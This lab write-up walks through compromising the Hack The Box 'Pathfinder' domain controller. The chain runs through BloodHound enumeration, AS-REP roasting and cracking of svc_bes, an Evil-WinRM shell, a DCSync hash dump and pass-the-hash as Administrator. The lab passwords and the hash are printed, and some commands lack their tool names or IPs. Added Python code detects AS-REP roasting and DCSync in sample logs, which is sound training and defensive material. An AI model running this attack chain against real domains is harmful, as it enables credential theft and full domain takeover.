HTB Starting Point – Pathfinder


[+] scan started...

[-] Open ports : 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49676,49677,49683,49698,49720 found

Starting Nmap 7.80 ( ) at 2020-05-21 22:39 CEST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.81% done; ETC: 22:41 (0:00:00 remaining)
Nmap scan report for
Host is up (0.042s latency).

53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-22 03:42:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m38s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-22T03:44:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 278.22 seconds
[+] scan finished...

Open ports detected: 

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-23 23:54:30Z)

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default. 

Using the credentials obtained on a previous machine in this path (sandra:Password1234!), we can attempt to enumerate Active Directory. We can do this with BloodHound; there is a Python BloodHound ingester, which can be found here.

Trying credentials from an earlier machine is the natural first step: if they are still valid in the domain, they give us an authenticated LDAP session for collection.

BloodHound is a single-page JavaScript web application that uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment. The Python ingestor installed below is based on Impacket and collects the same data from a Linux host over LDAP.

$ pip install bloodhound

/usr/share/python-wheels/pkg_resources-0.0.0-py3-none-any.whl/pkg_resources/ UserWarning: Setuptools will stop working on Python 2
You are running Setuptools on Python 2, which is no longer
supported and
in a subsequent release (no sooner than 2020-04-20).
Please ensure you are installing
Setuptools using pip 9.x or later or pin to `setuptools<45`
in your environment.
If you have done those things and are still encountering
this message, please follow up at
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at
Collecting bloodhound
  Downloading bloodhound-1.0.5-py2-none-any.whl (64 kB)
     |████████████████████████████████| 64 kB 1.8 MB/s
Collecting ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5
  Downloading ldap3-2.7-py2.py3-none-any.whl (420 kB)
     |████████████████████████████████| 420 kB 8.2 MB/s
Requirement already satisfied: pyasn1>=0.4 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.4.2)
Collecting dnspython
  Downloading dnspython-1.16.0-py2.py3-none-any.whl (188 kB)
     |████████████████████████████████| 188 kB 18.7 MB/s
Requirement already satisfied: impacket>=0.9.17 in /usr/lib/python2.7/dist-packages (from bloodhound) (0.9.20)
Requirement already satisfied: future in /usr/lib/python2.7/dist-packages (from bloodhound) (0.18.2)
Collecting ldapdomaindump>=0.9.0
  Downloading ldapdomaindump-0.9.2-py2-none-any.whl (21 kB)
ERROR: impacket 0.9.20 has requirement ldap3==2.5.1, but you'll have ldap3 2.7 which is incompatible.
Installing collected packages: ldap3, dnspython, bloodhound, ldapdomaindump
Successfully installed bloodhound-1.0.5 dnspython-1.16.0 ldap3-2.7 ldapdomaindump-0.9.2

To solve this error: 

$ bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns

INFO: Found AD domain: megacorp.local
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 5 users
INFO: Connecting to GC LDAP server: pathfinder.megacorp.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Pathfinder.MEGACORP.LOCAL
INFO: Done in 00M 08S

Installing and Starting BloodHound

BloodHound stores its graph in a neo4j database. After installing and configuring the neo4j service, start it:

$ neo4j console

Then start the BloodHound GUI and log in to the neo4j instance:

$ bloodhound --no-sandbox

Import the *.json files collected by the ingestor above.

Useful pre-built queries: "Shortest Paths to High Value Targets" and "Find Principals with DCSync Rights".

The second query shows that the svc_bes account has the GetChangesAll edge to the domain.
GetChangesAll means that svc_bes can request replication data from the domain controller. Normally only domain controllers hold this right, so a service account carrying it is a finding in its own right.

Lateral movement

Next we check whether Kerberos pre-authentication has been disabled for this account; if it has, the account is vulnerable to AS-REP Roasting.
We can check this using a tool such as Impacket's GetNPUsers.

Impacket install (run from the Impacket source directory):
$ pip install .

$ megacorp.local/svc_bes -request -no-pass -dc-ip

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes

The output is the AS-REP for svc_bes, which carries the user's Ticket Granting Ticket. Because pre-authentication is disabled, the KDC returns it to anyone who asks, and its encrypted part is protected only by a key derived from the user's password, so it can be cracked offline.

Save the returned hash to a new file.

$ vim svc_bes.hash

Use John the Ripper to recover the password from the hash.

$ john svc_bes.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:09 DONE (2020-05-24 12:46) 0.1049g/s 1112Kp/s 1112Kc/s 1112KC/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We now have the svc_bes credentials (username svc_bes, password Sheffield19).
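As an added defensive check (not part of the original walkthrough), the following Python covers both sides of what was just done: the account setting that makes AS-REP Roasting possible (userAccountControl carrying UF_DONT_REQUIRE_PREAUTH) and the log evidence it leaves (Event ID 4768 records issued without pre-authentication). The 4768 lines are constructed samples in a flattened key=value layout; the source IP values are made up.

```python
import re

# Bit in userAccountControl that disables Kerberos pre-authentication
# (UF_DONT_REQUIRE_PREAUTH = 0x400000, decimal 4194304).
# Remediation is to clear it, e.g. Set-ADAccountControl -DoesNotRequirePreAuth $false.
DONT_REQ_PREAUTH = 0x400000

# Constructed sample of Security Event ID 4768 (Kerberos TGT request) records,
# flattened to key=value pairs as a SIEM might export them; not real Pathfinder logs.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=svc_bes TargetDomainName=MEGACORP.LOCAL "
    "IpAddress=10.10.14.2 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=sandra TargetDomainName=MEGACORP.LOCAL "
    "IpAddress=10.10.10.30 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=nobody TargetDomainName=MEGACORP.LOCAL "
    "IpAddress=10.10.14.2 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
]

FIELD = re.compile(r"(\w+)=(\S+)")


def preauth_disabled(user_account_control: int) -> bool:
    """True when an account's userAccountControl carries UF_DONT_REQUIRE_PREAUTH,
    i.e. the KDC will hand out an AS-REP without any proof of the password."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


def asrep_roast_candidates(lines):
    """Return (user, source_ip, etype) for every successful TGT issued without
    pre-authentication. PreAuthType 0 means no pre-auth data was sent; Status 0x0
    means the KDC still returned a ticket, so its encrypted part is now in the
    requester's hands. etype 0x17 (RC4) is the cheapest to crack offline."""
    hits = []
    for line in lines:
        ev = dict(FIELD.findall(line))
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") == "0":
            hits.append((ev["TargetUserName"], ev["IpAddress"],
                         ev["TicketEncryptionType"]))
    return hits


if __name__ == "__main__":
    for user, src, etype in asrep_roast_candidates(SAMPLE_4768):
        print(f"AS-REP issued without pre-auth: {user} from {src} (etype {etype})")
```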

Then we can use WinRM to access the host with the svc_bes credentials. There are two options: a Python WinRM library (if you want to use it in your Python scripts) or a stand-alone WinRM shell, Evil-WinRM, which is used below.

$ sudo gem install evil-winrm

$ evil-winrm -i -u svc_bes -p Sheffield19

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> dir
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir

    Directory: C:\Users\svc_bes\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
*Evil-WinRM* PS C:\Users\svc_bes\Desktop>

Privilege escalation

To leverage the GetChangesAll permission, we can use Impacket to perform a DCSync attack and dump the NTLM hashes of all domain users.

DCSync is a late-stage kill chain technique in which an attacker simulates the behavior of a Domain Controller (DC) to retrieve password data via domain replication. Once an attacker controls an account with domain replication rights, they can use the replication protocol (the DRSUAPI method named in the output below) to mimic a domain controller.

NT LAN Manager (NTLM) is the Microsoft authentication protocol created as the successor of LM. The hashes dumped here are the NT hashes that NTLM authentication uses, which is why they can be replayed directly in the next step.

$ -dc-ip MEGACORP.LOCAL/svc_bes:Sheffield19@

Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
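As an added detection example (not from the walkthrough or from Impacket), this Python scans Event ID 4662 records from the domain controller for the directory-replication control-access rights and alerts when the requester is not a domain-controller machine account; this is the log footprint of the DRSUAPI dump above. The sample events and the KNOWN_DCS allow-list are constructed/assumed; the right GUIDs are the real AD schema values.

```python
import re

# Control-access-right GUIDs for directory replication (real AD schema values).
# Holding the first two is what BloodHound draws as the GetChanges/GetChangesAll edges.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # AccessMask for an extended-right (control access) check

# Assumed allow-list: domain controller machine accounts replicate legitimately.
KNOWN_DCS = {"PATHFINDER$"}

# Constructed Event ID 4662 samples ("an operation was performed on an object"),
# flattened to key=value pairs; the object is the domain head (domainDNS class).
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=PATHFINDER$ SubjectDomainName=MEGACORP "
    "ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} AccessMask=0x100 "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_bes SubjectDomainName=MEGACORP "
    "ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=sandra SubjectDomainName=MEGACORP "
    "ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2} AccessMask=0x10 "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
]

FIELD = re.compile(r"(\w+)=(\S+)")
GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")


def dcsync_alerts(lines, known_dcs=KNOWN_DCS):
    """Return (subject, [right names]) for each 4662 that exercises a replication
    right from a principal that is not a domain controller. DCSync needs
    Get-Changes plus Get-Changes-All, so both usually appear in one event."""
    alerts = []
    for line in lines:
        ev = dict(FIELD.findall(line))
        if ev.get("EventID") != "4662" or ev.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = [REPLICATION_RIGHTS[g] for g in GUID.findall(ev.get("Properties", ""))
                  if g in REPLICATION_RIGHTS]
        if rights and ev.get("SubjectUserName") not in known_dcs:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_4662):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

The same right set is what to review in the domain head's ACL when confirming the BloodHound finding against svc_bes.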

The RemoteOperations error is expected: svc_bes has no administrative rights on the DC, so the registry-based approach fails and the tool falls back to DRSUAPI, which needs only the replication rights. Using the built-in domain Administrator NTLM hash from the dump, we can perform a pass-the-hash (PtH) attack to gain elevated access to the system.

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems.

The dump entry for RID 500 (the built-in Administrator account), in the domain\uid:rid:lmhash:nthash format shown above, is:

500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::

The LM part, aad3b435b51404eeaad3b435b51404ee, is the well-known hash of an empty string, meaning no LM hash is stored; only the NT hash matters. We can pass both to one of Impacket's tools that accept -hashes (the target address follows the @):

$ megacorp.local/administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
